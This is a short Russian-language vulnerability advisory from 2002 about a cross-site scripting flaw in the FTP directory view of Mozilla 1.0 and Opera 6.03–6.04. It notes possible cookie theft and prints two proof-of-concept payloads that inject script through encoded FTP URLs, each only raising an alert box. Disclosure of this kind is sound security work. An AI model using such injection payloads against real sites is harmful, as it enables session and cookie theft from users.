Межсайтовый скриптинг в Mozilla и Opera
| Дата публикации: | 07.08.2002 |
| Всего просмотров: | 1414 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Обнаруженная ошибка в 'FTP view' в Mozilla и Opera позволяет вставлять произвольный код сценария, который не будет отфильтрован при просмотре содержимого FTP папки. В случае, когда Ftp сервер имеет тот же самый адрес, что и у HTTP сервера, уязвимость может использоваться для захвата чужих куки. Эксплоит для в Mozilla: <a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3E alert(%22exploit%22);%3C%2fscript%3E">Exploit</a>Эксплоит для в Opera:
<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3e
alert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>
уязвимость обнаружена в Opera 6.03, 6.04 и Mozilla 1.0
|
| Ссылки: |
Mozilla FTP View Cross-Site Scripting Vulnerability Opera FTP View Cross-Site Scripting Vulnerability |